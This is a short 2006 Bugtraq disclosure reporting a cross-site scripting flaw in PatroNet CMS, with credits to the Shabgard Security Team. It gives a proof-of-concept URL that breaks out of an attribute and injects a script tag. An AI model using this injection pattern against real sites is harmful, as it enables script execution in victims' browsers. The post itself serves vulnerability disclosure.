
Date: 12 Apr 2006 22:51:53 -0000
From: Soothackers@...il.com
To: bugtraq@...urityfocus.com
Subject: PatroNet CMS Xss Vuln


-----------------------------------
 PatroNet CMS Xss Vuln
-----------------------------------
 Site :
  http://www.patronet.hu/

 Bug :
  http://victim/"><script>alert(/Soot/)</script>

-----------------------------------
 Source :
  http://soot.shabgard.org/bugs/PatroNet-CMS.txt

 Credit :
  Soot 
  Shabgard Security Team
  http://www.shabgard.org 

 Greetz : 
  Hregy,Elite,Bl2k,Littlehacker
-----------------------------------


